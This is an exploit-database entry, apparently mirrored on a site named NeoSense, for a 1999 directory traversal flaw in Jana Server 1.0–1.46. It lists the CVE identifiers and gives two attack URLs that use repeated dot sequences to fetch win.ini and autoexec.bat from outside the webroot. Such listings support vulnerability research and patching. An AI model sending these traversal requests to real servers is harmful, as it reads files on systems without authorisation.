[] NeoSense
E X P L O I T S
title author type platform port cve id

T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

Author: Jason Lutz
type: remote
platform: windows
port: 
date_added: 1999-10-08 
date_updated: 2018-03-09 
verified: 1 
codes: CVE-1999-1083;OSVDB-5778;CVE-1999-1082 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/699/info


The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot.


http ://target/./.././.././.././win.ini
or
http ://target/....../autoexec.bat
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.